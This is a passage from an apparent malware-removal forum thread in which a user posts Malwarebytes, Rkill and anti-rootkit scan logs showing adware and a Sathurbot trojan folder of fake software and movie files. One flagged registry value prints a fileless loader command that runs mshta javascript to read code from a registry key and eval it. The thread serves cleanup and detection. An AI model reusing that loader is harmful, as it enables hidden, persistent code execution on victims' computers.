PUP.Optional.Linkey.AppFlsh, C:\Users\Mirna\AppData\Local\Google\Chrome\User Data\Default\Extensions\fpmeembnagmagppkgghhfjfdfajdfcah\1.0.0.5_0\_metadata\verified_contents.json, Quarantined, [14740], [181535],1.0.1064
PUP.Optional.Linkey.AppFlsh, C:\Users\Mirna\AppData\Local\Google\Chrome\User Data\Default\Extensions\fpmeembnagmagppkgghhfjfdfajdfcah\1.0.0.5_0\action-icon.png, Quarantined, [14740], [181535],1.0.1064
PUP.Optional.Linkey.AppFlsh, C:\Users\Mirna\AppData\Local\Google\Chrome\User Data\Default\Extensions\fpmeembnagmagppkgghhfjfdfajdfcah\1.0.0.5_0\background.html, Quarantined, [14740], [181535],1.0.1064
PUP.Optional.Linkey.AppFlsh, C:\Users\Mirna\AppData\Local\Google\Chrome\User Data\Default\Extensions\fpmeembnagmagppkgghhfjfdfajdfcah\1.0.0.5_0\background.js, Quarantined, [14740], [181535],1.0.1064
PUP.Optional.Linkey.AppFlsh, C:\Users\Mirna\AppData\Local\Google\Chrome\User Data\Default\Extensions\fpmeembnagmagppkgghhfjfdfajdfcah\1.0.0.5_0\bright_green_19_19.png, Quarantined, [14740], [181535],1.0.1064
PUP.Optional.Linkey.AppFlsh, C:\Users\Mirna\AppData\Local\Google\Chrome\User Data\Default\Extensions\fpmeembnagmagppkgghhfjfdfajdfcah\1.0.0.5_0\content.js, Quarantined, [14740], [181535],1.0.1064
PUP.Optional.Linkey.AppFlsh, C:\Users\Mirna\AppData\Local\Google\Chrome\User Data\Default\Extensions\fpmeembnagmagppkgghhfjfdfajdfcah\1.0.0.5_0\default_19_19.ico, Quarantined, [14740], [181535],1.0.1064
PUP.Optional.Linkey.AppFlsh, C:\Users\Mirna\AppData\Local\Google\Chrome\User Data\Default\Extensions\fpmeembnagmagppkgghhfjfdfajdfcah\1.0.0.5_0\default_19_19.png, Quarantined, [14740], [181535],1.0.1064
PUP.Optional.Linkey.AppFlsh, C:\Users\Mirna\AppData\Local\Google\Chrome\User Data\Default\Extensions\fpmeembnagmagppkgghhfjfdfajdfcah\1.0.0.5_0\hard_green_19_19.png, Quarantined, [14740], [181535],1.0.1064
PUP.Optional.Linkey.AppFlsh, C:\Users\Mirna\AppData\Local\Google\Chrome\User Data\Default\Extensions\fpmeembnagmagppkgghhfjfdfajdfcah\1.0.0.5_0\icon128.png, Quarantined, [14740], [181535],1.0.1064
PUP.Optional.Linkey.AppFlsh, C:\Users\Mirna\AppData\Local\Google\Chrome\User Data\Default\Extensions\fpmeembnagmagppkgghhfjfdfajdfcah\1.0.0.5_0\icon16.png, Quarantined, [14740], [181535],1.0.1064
PUP.Optional.Linkey.AppFlsh, C:\Users\Mirna\AppData\Local\Google\Chrome\User Data\Default\Extensions\fpmeembnagmagppkgghhfjfdfajdfcah\1.0.0.5_0\icon48.png, Quarantined, [14740], [181535],1.0.1064
PUP.Optional.Linkey.AppFlsh, C:\Users\Mirna\AppData\Local\Google\Chrome\User Data\Default\Extensions\fpmeembnagmagppkgghhfjfdfajdfcah\1.0.0.5_0\manifest.json, Quarantined, [14740], [181535],1.0.1064
PUP.Optional.Linkey.AppFlsh, C:\Users\Mirna\AppData\Local\Google\Chrome\User Data\Default\Extensions\fpmeembnagmagppkgghhfjfdfajdfcah\1.0.0.5_0\newtab.html, Quarantined, [14740], [181535],1.0.1064
PUP.Optional.Linkey.AppFlsh, C:\Users\Mirna\AppData\Local\Google\Chrome\User Data\Default\Extensions\fpmeembnagmagppkgghhfjfdfajdfcah\1.0.0.5_0\orange_19_19.png, Quarantined, [14740], [181535],1.0.1064
PUP.Optional.Linkey.AppFlsh, C:\Users\Mirna\AppData\Local\Google\Chrome\User Data\Default\Extensions\fpmeembnagmagppkgghhfjfdfajdfcah\1.0.0.5_0\red_19_19.png, Quarantined, [14740], [181535],1.0.1064
PUP.Optional.Linkey.AppFlsh, C:\Users\Mirna\AppData\Local\Google\Chrome\User Data\Default\Extensions\fpmeembnagmagppkgghhfjfdfajdfcah\1.0.0.5_0\yellow_19_19.png, Quarantined, [14740], [181535],1.0.1064
PUP.Optional.DoSearch.ShrtCln, C:\USERS\LAC\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\BWYNG1S2.DEFAULT\PREFS.JS, Replaced, [13947], [301368],1.0.1064
PUP.Optional.DoSearch.ShrtCln, C:\USERS\LAC\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\BWYNG1S2.DEFAULT\PREFS.JS, Replaced, [13947], [301370],1.0.1064
PUP.Optional.SearchEngine, C:\USERS\LAC\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\BWYNG1S2.DEFAULT\PREFS.JS, Replaced, [14710], [303346],1.0.1064
PUP.Optional.OpenCandy, C:\USERS\LAC\DOWNLOADS\GOMPLAYERENSETUP.EXE, Quarantined, [646], [297667],1.0.1064
PUP.Optional.InstallCore, C:\USERS\LAC\DOWNLOADS\MP3PLAYER_SETUP.EXE, Quarantined, [8], [78220],1.0.1064
PUP.Optional.DoSearch.ShrtCln, C:\USERS\LAC\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\BWYNG1S2.DEFAULT\SEARCHPLUGINS\DO-SEARCH.XML, Delete-on-Reboot, [13947], [187042],1.0.1064
PUP.Optional.Amazon1Button.AppFlsh, C:\PROGRAM FILES (X86)\AMAZON\AMAZON1BUTTONAPP\Amazon1ButtonService64.Exe, Quarantined, [1755], [333344],1.0.1064
 
Physical Sector: 0
(No malicious items detected)
 
 
(end)


#8 Lasz100

Lasz100
  • Topic Starter

  • Members
  • 13 posts
  • OFFLINE
  •  
  • Local time:03:07 PM

Posted 28 February 2017 - 02:38 PM

and finally Rkill output:

 

Rkill 2.8.4 by Lawrence Abrams (Grinler)
Copyright 2008-2017 BleepingComputer.com
More Information about Rkill can be found at this link:
 
Program started at: 02/28/2017 01:33:29 PM in x64 mode.
Windows Version: Windows 10 Home 
 
Checking for Windows services to stop:
 
 * No malware services found to stop.
 
Checking for processes to terminate:
 
 * No malware processes found to kill.
 
Checking Registry for malware related settings:
 
 * No issues found in the Registry.
 
Resetting .EXE, .COM, & .BAT associations in the Windows Registry.
 
Performing miscellaneous checks:
 
 * No issues found.
 
Checking Windows Service Integrity: 
 
 * gagp30kx [Missing Service]
 * IEEtwCollectorService [Missing Service]
 * IoQos [Missing Service]
 * nv_agp [Missing Service]
 * TimeBroker [Missing Service]
 * tunnel [Missing Service]
 * uagp35 [Missing Service]
 * uliagpkx [Missing Service]
 * WcsPlugInService [Missing Service]
 * wpcfltr [Missing Service]
 * WSService [Missing Service]
 * WUDFRd [Missing Service]
 
 * agp440 [Missing ImagePath]
 
 * AJRouter => %SystemRoot%\system32\svchost.exe -k LocalServiceNetworkRestricted [Incorrect ImagePath]
 * WpnService => %systemroot%\system32\svchost.exe -k netsvcs [Incorrect ImagePath]
 
 * vmicrdv => %SystemRoot%\System32\icsvcext.dll [Incorrect ServiceDLL]
 * vmicvss => %SystemRoot%\System32\icsvcext.dll [Incorrect ServiceDLL]
 
Searching for Missing Digital Signatures: 
 
 * No issues found.
 
Checking HOSTS File: 
 
 * HOSTS file entries found: 
 
  127.0.0.1       localhost
 
Program finished at: 02/28/2017 01:37:15 PM
Execution time: 0 hours(s), 3 minute(s), and 46 seconds(s)


#9 Broni

Broni

    The Coolest BC Computer


  • BC Advisor
  • 42,611 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Daly City, CA
  • Local time:02:07 PM

Posted 28 February 2017 - 08:47 PM

I still need MBAR log.


My Website

p4433470.gif

My help doesn't cost a penny, but if you'd like to consider a donation, click p22001735.gif


 


#10 Lasz100

Lasz100
  • Topic Starter

  • Members
  • 13 posts
  • OFFLINE
  •  
  • Local time:03:07 PM

Posted 02 March 2017 - 03:11 PM

Hi Broni,

The logs of the MBar scan are below.

 

MBAR-LOG:

 

Malwarebytes Anti-Rootkit BETA 1.9.3.1001

www.malwarebytes.org

 

Database version:

  main:    v2017.03.02.10

  rootkit: v2017.02.27.01

 

Windows 10 x64 NTFS

Internet Explorer 11.576.14393.0

Lac :: LASZLO [administrator]

 

02/03/2017 11:16:53

mbar-log-2017-03-02 (11-16-53).txt

 

Scan type: Quick scan

Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken

Scan options disabled: 

Objects scanned: 889386

Time elapsed: 2 hour(s), 10 minute(s), 22 second(s)

 

Memory Processes Detected: 0

(No malicious items detected)

 

Memory Modules Detected: 0

(No malicious items detected)

 

Registry Keys Detected: 1

HKU\S-1-5-21-971398213-2469251586-1946301387-1001_Classes\F4F58CEE\SHELL\OPEN\COMMAND (Rootkit.Fileless.MTGen) -> Delete on reboot. [fc4611b4f5b376c00160b423ed16cc34]

 

Registry Values Detected: 1

HKU\S-1-5-21-971398213-2469251586-1946301387-1001_Classes\f4f58cee\SHELL\OPEN\COMMAND| (Rootkit.Fileless.MTGen) -> Data: "C:\WINDOWS\system32\mshta.exe" "javascript:FqJn43umy="79eWh";gU05=new ActiveXObject("WScript.Shell");RvM5hj="T2Lq3";T1Qi5U=gU05.RegRead("HKCU\\software\\wcyearp\\ufjcdo");uuoY9wK="9M2jF";eval(T1Qi5U);KUK8Q="2D631j4p";" -> Delete on reboot. [fc4611b4f5b376c00160b423ed16cc34]

 

Registry Data Items Detected: 0

(No malicious items detected)

 

Folders Detected: 26

C:\ProgramData\Microsoft\Performance\Monitor (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\10eaad1570aedd202d35448ce1b6510e (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\752dd3faa0069fa6a98a9172ac529c66 (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\78f85c2db5fe2cf2e6749bbde04ae3b7 (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\d7829581270ee06fb19eced7ca56361d (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\59089003ea871820800f3301d761d960 (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\8913b2aed98d13540ea7a6b4b3e9c39c (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\698b40b1cf28d237be079bdeee463675 (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\92817e3e77145ec7d00c23fd46521e43 (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\978b477f7a38ea51fd369f9f89037116 (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\996d9960b44f265ea9e789832eab461f (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\1889510961d5d0f964e0d1ddd6f333a9 (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\198e5a3fbc946ac7cb0d016adaaf33c9 (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c4dd58bd85f5169a89ebb47fef97ae09 (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\2a4c75f6738f20a331086e9d552fd36f (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\2bc5732abd484dab03ad771317bac60e (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\34b1d5e7d25d48c7630e0ba41d9b301b (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\358915c23ca7dd8d29c2586bc2f9bb5d (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\37db5be0d4d35939445e87d9d0f890ce (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\4f945ccb2944bc4e607ed26847a5174b (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\4fdbefb5dc0733a6b4dabaaf366227cb (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\51408563b61798158c3c9b122fd24e06 (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\5fc9283d2e7d46535121d14130ddd344 (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

 

Files Detected: 85

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\752dd3faa0069fa6a98a9172ac529c66 (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\78f85c2db5fe2cf2e6749bbde04ae3b7 (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\d7829581270ee06fb19eced7ca56361d (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\59089003ea871820800f3301d761d960 (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\8913b2aed98d13540ea7a6b4b3e9c39c (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\698b40b1cf28d237be079bdeee463675 (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\92817e3e77145ec7d00c23fd46521e43 (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\978b477f7a38ea51fd369f9f89037116 (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\996d9960b44f265ea9e789832eab461f (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\1889510961d5d0f964e0d1ddd6f333a9 (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\198e5a3fbc946ac7cb0d016adaaf33c9 (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\c4dd58bd85f5169a89ebb47fef97ae09 (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\2a4c75f6738f20a331086e9d552fd36f (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\2bc5732abd484dab03ad771317bac60e (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\34b1d5e7d25d48c7630e0ba41d9b301b (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\358915c23ca7dd8d29c2586bc2f9bb5d (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\37db5be0d4d35939445e87d9d0f890ce (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\4f945ccb2944bc4e607ed26847a5174b (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\4fdbefb5dc0733a6b4dabaaf366227cb (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\51408563b61798158c3c9b122fd24e06 (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\5fc9283d2e7d46535121d14130ddd344 (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\10eaad1570aedd202d35448ce1b6510e\Setup.dat (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\10eaad1570aedd202d35448ce1b6510e\Warcraft III The Frozen Throne Patch.exe (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\10eaad1570aedd202d35448ce1b6510e\Warcraft III The Frozen Throne Patch.txt (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\752dd3faa0069fa6a98a9172ac529c66\Arrow [SE04].txt (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\752dd3faa0069fa6a98a9172ac529c66\Ultra XVid Codec Pack.exe (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\752dd3faa0069fa6a98a9172ac529c66\Video.avi (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\78f85c2db5fe2cf2e6749bbde04ae3b7\Max Rose 2013.avi (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\78f85c2db5fe2cf2e6749bbde04ae3b7\Max Rose 2013.txt (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\78f85c2db5fe2cf2e6749bbde04ae3b7\Ultra XVid Codec Pack.exe (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\d7829581270ee06fb19eced7ca56361d\Rapid Typing Tutor 5.exe (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\d7829581270ee06fb19eced7ca56361d\Rapid Typing Tutor 5.txt (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\59089003ea871820800f3301d761d960\Allied 2016.avi (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\59089003ea871820800f3301d761d960\Allied 2016.txt (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\59089003ea871820800f3301d761d960\Ultra XVid Codec Pack.exe (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\8913b2aed98d13540ea7a6b4b3e9c39c\Grand Theft Auto V.exe (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\8913b2aed98d13540ea7a6b4b3e9c39c\Grand Theft Auto V.txt (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\8913b2aed98d13540ea7a6b4b3e9c39c\Setup.dat (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\698b40b1cf28d237be079bdeee463675\Miss Sloane 2016.avi (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\698b40b1cf28d237be079bdeee463675\Miss Sloane 2016.txt (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\698b40b1cf28d237be079bdeee463675\Ultra XVid Codec Pack.exe (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\92817e3e77145ec7d00c23fd46521e43\Adobe Photoshop CC 2015.exe (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\92817e3e77145ec7d00c23fd46521e43\Adobe Photoshop CC 2015.txt (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\92817e3e77145ec7d00c23fd46521e43\Setup.dat (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\978b477f7a38ea51fd369f9f89037116\Dci 2016 Big Loud.avi (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\978b477f7a38ea51fd369f9f89037116\Dci 2016 Big Loud.txt (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\978b477f7a38ea51fd369f9f89037116\Ultra XVid Codec Pack.exe (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\996d9960b44f265ea9e789832eab461f\Befikre 2016.avi (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\996d9960b44f265ea9e789832eab461f\Befikre 2016.txt (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\996d9960b44f265ea9e789832eab461f\Ultra XVid Codec Pack.exe (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\1889510961d5d0f964e0d1ddd6f333a9\Kung Fu Panda 3.avi (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\1889510961d5d0f964e0d1ddd6f333a9\Kung Fu Panda 3.txt (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\1889510961d5d0f964e0d1ddd6f333a9\Ultra XVid Codec Pack.exe (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\198e5a3fbc946ac7cb0d016adaaf33c9\In Dubious Battle 2016.avi (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\198e5a3fbc946ac7cb0d016adaaf33c9\In Dubious Battle 2016.txt (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\198e5a3fbc946ac7cb0d016adaaf33c9\Ultra XVid Codec Pack.exe (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c4dd58bd85f5169a89ebb47fef97ae09\The Conjuring 2.avi (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c4dd58bd85f5169a89ebb47fef97ae09\The Conjuring 2.txt (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c4dd58bd85f5169a89ebb47fef97ae09\Ultra XVid Codec Pack.exe (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\2a4c75f6738f20a331086e9d552fd36f\Sully 2016.avi (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\2a4c75f6738f20a331086e9d552fd36f\Sully 2016.txt (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\2a4c75f6738f20a331086e9d552fd36f\Ultra XVid Codec Pack.exe (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\2bc5732abd484dab03ad771317bac60e\Bounty Hunters 2016.avi (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\2bc5732abd484dab03ad771317bac60e\Bounty Hunters 2016.txt (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\2bc5732abd484dab03ad771317bac60e\Ultra XVid Codec Pack.exe (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\34b1d5e7d25d48c7630e0ba41d9b301b\KMSpico 10.2.exe (Trojan.Sathurbot.E) -> Delete on reboot. [bf83eed77434ea4c5efaaf214fb1916f]

